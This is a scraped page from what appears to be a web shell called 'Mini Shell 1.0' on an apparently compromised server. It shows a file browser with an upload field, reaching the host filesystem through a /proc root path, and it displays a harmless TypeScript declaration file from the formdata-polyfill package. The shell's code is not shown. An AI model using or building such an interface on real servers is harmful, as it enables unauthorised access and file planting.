HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1780863/root/usr/share/node_modules/formdata-polyfill/
Upload File :
Current File : //proc/1780863/root/usr/share/node_modules/formdata-polyfill/esm.min.d.ts
export declare const FormData: {
  new (): typeof FormData;
  prototype: typeof FormData;
};
export declare function formDataToBlob(formData: typeof FormData): Blob;